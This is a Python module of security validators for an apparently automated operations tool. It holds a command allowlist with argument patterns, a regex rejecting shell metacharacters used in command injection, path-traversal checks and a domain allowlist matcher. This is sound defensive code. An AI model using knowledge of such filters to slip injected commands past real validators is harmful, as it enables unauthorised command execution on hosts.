403 lines
12 KiB
Python
403 lines
12 KiB
Python
"""Security validation utilities for safe command and file operations."""
|
|
|
|
import re
|
|
from pathlib import Path
|
|
from typing import Optional
|
|
|
|
# Shell metacharacters that must NEVER appear in commands
|
|
# These can be used for command injection attacks
|
|
FORBIDDEN_SHELL_PATTERNS = re.compile(r'[`$();|&<>]')
|
|
|
|
# ENV key validation pattern: uppercase letters, numbers, underscore; must start with letter
|
|
ENV_KEY_PATTERN = re.compile(r'^[A-Z][A-Z0-9_]*$')
|
|
|
|
# Allowed commands with their argument validation patterns and timeouts
|
|
# Keys are ABSOLUTE paths to prevent PATH hijacking
|
|
ALLOWED_COMMANDS: dict[str, dict] = {
|
|
# File system inspection
|
|
"/usr/bin/ls": {
|
|
"args_pattern": r"^[-alhrRtS\s/\w.]*$",
|
|
"timeout": 30,
|
|
"description": "List directory contents",
|
|
},
|
|
"/usr/bin/cat": {
|
|
"args_pattern": r"^[\w./\-]+$",
|
|
"timeout": 30,
|
|
"description": "Display file contents",
|
|
},
|
|
"/usr/bin/df": {
|
|
"args_pattern": r"^[-hT\s/\w]*$",
|
|
"timeout": 30,
|
|
"description": "Disk space usage",
|
|
},
|
|
"/usr/bin/free": {
|
|
"args_pattern": r"^[-hmg\s]*$",
|
|
"timeout": 30,
|
|
"description": "Memory usage",
|
|
},
|
|
"/usr/bin/du": {
|
|
"args_pattern": r"^[-shc\s/\w.]*$",
|
|
"timeout": 60,
|
|
"description": "Directory size",
|
|
},
|
|
# Docker operations
|
|
"/usr/bin/docker": {
|
|
"args_pattern": r"^(compose|ps|logs|images|inspect|stats)[\s\w.\-/:]*$",
|
|
"timeout": 300,
|
|
"description": "Docker operations (limited subcommands)",
|
|
},
|
|
# Service management
|
|
"/usr/bin/systemctl": {
|
|
"args_pattern": r"^(status|restart|start|stop|enable|disable|is-active)\s+[\w\-@.]+$",
|
|
"timeout": 60,
|
|
"description": "Systemd service management",
|
|
},
|
|
# Network diagnostics
|
|
"/usr/bin/curl": {
|
|
"args_pattern": r"^(-s\s+)?-o\s+/dev/null\s+-w\s+['\"]?%\{[^}]+\}['\"]?\s+https?://[\w.\-/:]+$",
|
|
"timeout": 30,
|
|
"description": "HTTP health checks only",
|
|
},
|
|
}
|
|
|
|
|
|
class ValidationError(Exception):
|
|
"""Raised when validation fails."""
|
|
|
|
pass
|
|
|
|
|
|
def validate_shell_command(cmd: str, args: str = "") -> tuple[str, list[str], int]:
|
|
"""Validate a shell command against security policies.
|
|
|
|
Args:
|
|
cmd: The command to execute (should be absolute path)
|
|
args: Command arguments as a string
|
|
|
|
Returns:
|
|
Tuple of (absolute_cmd_path, args_list, timeout)
|
|
|
|
Raises:
|
|
ValidationError: If the command or arguments fail validation
|
|
"""
|
|
# Normalize command path
|
|
cmd = cmd.strip()
|
|
|
|
# Check for forbidden patterns in command
|
|
if FORBIDDEN_SHELL_PATTERNS.search(cmd):
|
|
raise ValidationError(f"Command contains forbidden characters: {cmd}")
|
|
|
|
# Check for forbidden patterns in arguments
|
|
if args and FORBIDDEN_SHELL_PATTERNS.search(args):
|
|
raise ValidationError(f"Arguments contain forbidden characters: {args}")
|
|
|
|
# Verify command is in allowlist
|
|
if cmd not in ALLOWED_COMMANDS:
|
|
# Try to find if user provided just the command name
|
|
for allowed_cmd in ALLOWED_COMMANDS:
|
|
if allowed_cmd.endswith(f"/{cmd}"):
|
|
raise ValidationError(
|
|
f"Command '{cmd}' must use absolute path: {allowed_cmd}"
|
|
)
|
|
raise ValidationError(f"Command not in allowlist: {cmd}")
|
|
|
|
schema = ALLOWED_COMMANDS[cmd]
|
|
|
|
# Validate arguments against pattern
|
|
if args:
|
|
args = args.strip()
|
|
if not re.match(schema["args_pattern"], args):
|
|
raise ValidationError(
|
|
f"Arguments do not match allowed pattern for {cmd}: {args}"
|
|
)
|
|
|
|
# Parse arguments into list (safely, no shell interpretation)
|
|
args_list = args.split() if args else []
|
|
|
|
return cmd, args_list, schema["timeout"]
|
|
|
|
|
|
def validate_file_path(
|
|
path: str,
|
|
allowed_root: str,
|
|
must_exist: bool = False,
|
|
max_size: Optional[int] = None,
|
|
) -> Path:
|
|
"""Validate a file path against security policies.
|
|
|
|
Args:
|
|
path: The file path to validate
|
|
allowed_root: The root directory that path must be within
|
|
must_exist: If True, verify the file exists
|
|
max_size: If provided, verify file size is under limit (for existing files)
|
|
|
|
Returns:
|
|
Resolved Path object
|
|
|
|
Raises:
|
|
ValidationError: If the path fails validation
|
|
"""
|
|
# Reject paths with obvious traversal attempts
|
|
if ".." in path:
|
|
raise ValidationError(f"Path contains directory traversal: {path}")
|
|
|
|
# Convert to Path objects
|
|
try:
|
|
file_path = Path(path).expanduser()
|
|
root_path = Path(allowed_root).expanduser().resolve()
|
|
except (ValueError, RuntimeError) as e:
|
|
raise ValidationError(f"Invalid path format: {e}")
|
|
|
|
# Resolve to canonical path (follows symlinks, resolves ..)
|
|
try:
|
|
resolved_path = file_path.resolve()
|
|
except (OSError, RuntimeError) as e:
|
|
raise ValidationError(f"Cannot resolve path: {e}")
|
|
|
|
# Verify path is within allowed root
|
|
try:
|
|
resolved_path.relative_to(root_path)
|
|
except ValueError:
|
|
raise ValidationError(
|
|
f"Path {resolved_path} is outside allowed root {root_path}"
|
|
)
|
|
|
|
# Check existence if required
|
|
if must_exist and not resolved_path.exists():
|
|
raise ValidationError(f"File does not exist: {resolved_path}")
|
|
|
|
# Check file size if applicable
|
|
if max_size is not None and resolved_path.is_file():
|
|
file_size = resolved_path.stat().st_size
|
|
if file_size > max_size:
|
|
raise ValidationError(
|
|
f"File size {file_size} exceeds limit {max_size}: {resolved_path}"
|
|
)
|
|
|
|
return resolved_path
|
|
|
|
|
|
def sanitize_input(text: str, max_length: int = 10000) -> str:
|
|
"""Sanitize text input by removing dangerous characters.
|
|
|
|
Args:
|
|
text: Input text to sanitize
|
|
max_length: Maximum allowed length
|
|
|
|
Returns:
|
|
Sanitized text
|
|
|
|
Raises:
|
|
ValidationError: If input exceeds max length
|
|
"""
|
|
if len(text) > max_length:
|
|
raise ValidationError(f"Input exceeds maximum length of {max_length}")
|
|
|
|
# Remove null bytes and other control characters (except newlines and tabs)
|
|
sanitized = "".join(
|
|
char for char in text
|
|
if char in "\n\t" or (ord(char) >= 32 and ord(char) != 127)
|
|
)
|
|
|
|
return sanitized
|
|
|
|
|
|
def validate_compose_path(path: str, allowed_paths: list[str]) -> Path:
|
|
"""Validate a docker-compose file path.
|
|
|
|
Args:
|
|
path: Path to compose file
|
|
allowed_paths: List of allowed parent directories
|
|
|
|
Returns:
|
|
Resolved Path object
|
|
|
|
Raises:
|
|
ValidationError: If path is not in allowed directories
|
|
"""
|
|
if ".." in path:
|
|
raise ValidationError(f"Path contains directory traversal: {path}")
|
|
|
|
try:
|
|
resolved = Path(path).expanduser().resolve()
|
|
except (ValueError, RuntimeError) as e:
|
|
raise ValidationError(f"Invalid compose path: {e}")
|
|
|
|
# Check if path is within any allowed directory
|
|
for allowed in allowed_paths:
|
|
try:
|
|
allowed_path = Path(allowed).expanduser().resolve()
|
|
resolved.relative_to(allowed_path)
|
|
# Path is within this allowed directory
|
|
if not resolved.exists():
|
|
raise ValidationError(f"Compose file does not exist: {resolved}")
|
|
if not resolved.name.endswith((".yml", ".yaml")):
|
|
raise ValidationError(f"Not a YAML file: {resolved}")
|
|
return resolved
|
|
except ValueError:
|
|
# Not within this allowed path, try next
|
|
continue
|
|
|
|
raise ValidationError(
|
|
f"Compose path {resolved} is not in allowed directories: {allowed_paths}"
|
|
)
|
|
|
|
|
|
def validate_env_key(key: str) -> bool:
|
|
"""Validate an environment variable key format.
|
|
|
|
Keys must:
|
|
- Start with an uppercase letter (A-Z)
|
|
- Contain only uppercase letters, numbers, and underscores
|
|
|
|
Args:
|
|
key: The environment variable key to validate
|
|
|
|
Returns:
|
|
True if valid
|
|
|
|
Raises:
|
|
ValidationError: If the key format is invalid
|
|
"""
|
|
if not key:
|
|
raise ValidationError("ENV key cannot be empty")
|
|
|
|
if not ENV_KEY_PATTERN.match(key):
|
|
raise ValidationError(
|
|
f"Invalid ENV key format '{key}': must match ^[A-Z][A-Z0-9_]*$"
|
|
)
|
|
|
|
return True
|
|
|
|
|
|
def is_domain_allowed(url: str, allowed_domains: list[str]) -> bool:
|
|
"""Check if a URL's domain is in the allowed list.
|
|
|
|
Supports:
|
|
- Exact domain match: "cloud.example.com"
|
|
- Wildcard subdomain: "*.example.com" (matches any subdomain)
|
|
- Port specification: "cloud.example.com:8443"
|
|
|
|
Args:
|
|
url: The URL to check
|
|
allowed_domains: List of allowed domain patterns
|
|
|
|
Returns:
|
|
True if the domain is allowed, False otherwise
|
|
|
|
Examples:
|
|
>>> is_domain_allowed("https://cloud.example.com/path", ["cloud.example.com"])
|
|
True
|
|
>>> is_domain_allowed("https://sub.example.com", ["*.example.com"])
|
|
True
|
|
>>> is_domain_allowed("https://evil.com", ["example.com"])
|
|
False
|
|
"""
|
|
from urllib.parse import urlparse
|
|
|
|
if not url or not allowed_domains:
|
|
return False
|
|
|
|
try:
|
|
parsed = urlparse(url)
|
|
url_host = parsed.netloc.lower()
|
|
|
|
# Handle URLs without scheme (shouldn't happen, but be safe)
|
|
if not url_host and parsed.path:
|
|
# URL might be like "example.com/path" without scheme
|
|
url_host = parsed.path.split("/")[0].lower()
|
|
|
|
if not url_host:
|
|
return False
|
|
|
|
# Extract port if present in URL
|
|
if ":" in url_host:
|
|
url_domain, url_port = url_host.rsplit(":", 1)
|
|
else:
|
|
url_domain = url_host
|
|
url_port = None
|
|
|
|
for pattern in allowed_domains:
|
|
pattern = pattern.lower().strip()
|
|
|
|
# Extract port from pattern if present
|
|
if ":" in pattern and not pattern.startswith("*."):
|
|
pattern_domain, pattern_port = pattern.rsplit(":", 1)
|
|
elif ":" in pattern:
|
|
# Handle "*.example.com:8443"
|
|
parts = pattern.split(":")
|
|
pattern_domain = parts[0]
|
|
pattern_port = parts[1] if len(parts) > 1 else None
|
|
else:
|
|
pattern_domain = pattern
|
|
pattern_port = None
|
|
|
|
# If pattern specifies a port, URL must match that port
|
|
if pattern_port and url_port != pattern_port:
|
|
continue
|
|
|
|
# Wildcard subdomain match
|
|
if pattern_domain.startswith("*."):
|
|
suffix = pattern_domain[2:] # Remove "*."
|
|
# Match the suffix or the exact domain without subdomain
|
|
if url_domain == suffix or url_domain.endswith("." + suffix):
|
|
return True
|
|
else:
|
|
# Exact match
|
|
if url_domain == pattern_domain:
|
|
return True
|
|
|
|
return False
|
|
|
|
except Exception:
|
|
return False
|
|
|
|
|
|
def validate_allowed_domains(domains: list[str]) -> list[str]:
|
|
"""Validate and normalize a list of allowed domains.
|
|
|
|
Args:
|
|
domains: List of domain patterns to validate
|
|
|
|
Returns:
|
|
List of normalized domain patterns
|
|
|
|
Raises:
|
|
ValidationError: If any domain pattern is invalid
|
|
"""
|
|
if not domains:
|
|
raise ValidationError("allowed_domains cannot be empty")
|
|
|
|
normalized = []
|
|
for domain in domains:
|
|
domain = domain.strip().lower()
|
|
|
|
if not domain:
|
|
raise ValidationError("Empty domain in allowed_domains list")
|
|
|
|
# Basic format validation
|
|
if domain.startswith("http://") or domain.startswith("https://"):
|
|
raise ValidationError(
|
|
f"Domain should not include protocol: {domain}. "
|
|
"Use 'example.com' not 'https://example.com'"
|
|
)
|
|
|
|
# Wildcard validation
|
|
if "*" in domain:
|
|
if not domain.startswith("*."):
|
|
raise ValidationError(
|
|
f"Invalid wildcard pattern: {domain}. "
|
|
"Wildcards must be at the start: '*.example.com'"
|
|
)
|
|
# Ensure there's something after the wildcard
|
|
suffix = domain[2:]
|
|
if "." not in suffix or suffix.startswith("."):
|
|
raise ValidationError(
|
|
f"Invalid wildcard pattern: {domain}. "
|
|
"Must have a valid domain after '*.' like '*.example.com'"
|
|
)
|
|
|
|
normalized.append(domain)
|
|
|
|
return normalized
|